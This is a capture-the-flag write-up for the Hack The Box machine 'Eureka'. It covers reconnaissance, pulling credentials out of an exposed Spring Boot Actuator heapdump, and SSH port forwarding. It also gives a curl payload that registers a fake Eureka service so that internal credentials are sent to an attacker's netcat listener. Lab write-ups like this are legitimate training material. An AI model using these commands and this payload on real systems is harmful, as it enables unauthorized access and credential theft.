Eureka HTB Writeup - HacktheBox - lazyhackers

Eureka is a non-seasonal Linux-based machine on Hack The Box, categorized as a Hard challenge. Upon completing this box, you earn 40 points. The machine teaches you how exposed Spring Boot Actuator endpoints can leak sensitive internal assets. By analyzing these endpoints, you eventually discover a heap dump that reveals credentials, allowing initial access. From there, you exploit Eureka by performing a malicious service registration to escalate privileges and gain further control of the system.

2025-05-04 03:04:42 - xone

🔍 Reconnaissance

Let’s start with setting the target IP as an environment variable for convenience:

export IP='10.10.11.66'

Run a full TCP scan with service and version detection:

nmap -v -sCTV -p- -T4 -Pn -oN $IP.txt $IP

Nmap Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
8761/tcp open  http    Apache Tomcat (language: en)

Port 80 redirects to http://furni.htb/, so we add it to /etc/hosts:

echo "$IP furni.htb" | sudo tee -a /etc/hosts

🌐 Web Enumeration

Now, let's use dirsearch to brute-force directories on the web server:

dirsearch -u http://furni.htb/ -e php,html,txt -t 50

Discovered Endpoints:

/actuator/env
/actuator/features
/actuator/health
/actuator/info
/actuator/metrics
/actuator/configprops
/actuator/beans
/actuator/threaddump
/actuator/loggers
/actuator/mappings
/actuator/heapdump  ←  🚨 Interesting!

📥 Heapdump Extraction

Downloaded the heapdump:

http://furni.htb/actuator/heapdump

Analyzed the file using strings:

strings heapdump | grep "password="

Credentials Found:

{password=0***********&, user=o*********}

Another one found using:

strings heapdump | grep PWD

http://EurekaSrvr:****************@localhost:8761/eureka

🔑 Initial Foothold

ssh ********@10.10.11.66
Password: ************

We are now logged in as O*****.

🔁 Port Forwarding

Since port 8761 is interesting and hosted locally, we forward it to ourselves:

ssh -L 8761:localhost:8761 ******@10.10.11.66

Access the Eureka admin panel via browser:

http://localhost:8761

⚙️ Exploiting Eureka with Malicious Registration

Start a netcat listener to receive a reverse shell or connection:

nc -lvnp 8081

Now register a malicious fake service using the stolen Eureka credentials:

curl -X POST http://USERNAME:PASSWORD@127.0.0.1:8761/eureka/apps/USER-MANAGEMENT-SERVICE \
  -H 'Content-Type: application/json' \
  -d '{
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "YOURIP",
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "YOURIP",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": { "$": 8081, "@enabled": "true" },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'

Replace USERNAME and PASSWORD .

Replace YOURIP with your tun0 IP.

After a short wait (~2 minutes), we receive credentials via netcat:

Username: mi**********  
Password: IL***********

🧠 Privilege Escalation

ssh mi*******@10.10.11.66
Password: I**********

Now you're logged in as a more privileged user.

Grab the user flag:

cat ~/user.txt

🏁 Summary

✅ Found hidden directories using Dirsearch
✅ Extracted credentials from heapdump
✅ Used SSH and port forwarding to access Eureka dashboard
✅ Exploited service registration to gain new credentials
✅ Escalated privileges and got the user flag

🎯 Tools Used

nmap
dirsearch
strings
ssh + port forwarding
curl
netcat

Root

Access is restricted by HackTheBox rules#

The solution to the problem can be published in the public domain after her retirement.

Look for a non-public solution to the problem in the telegram channel .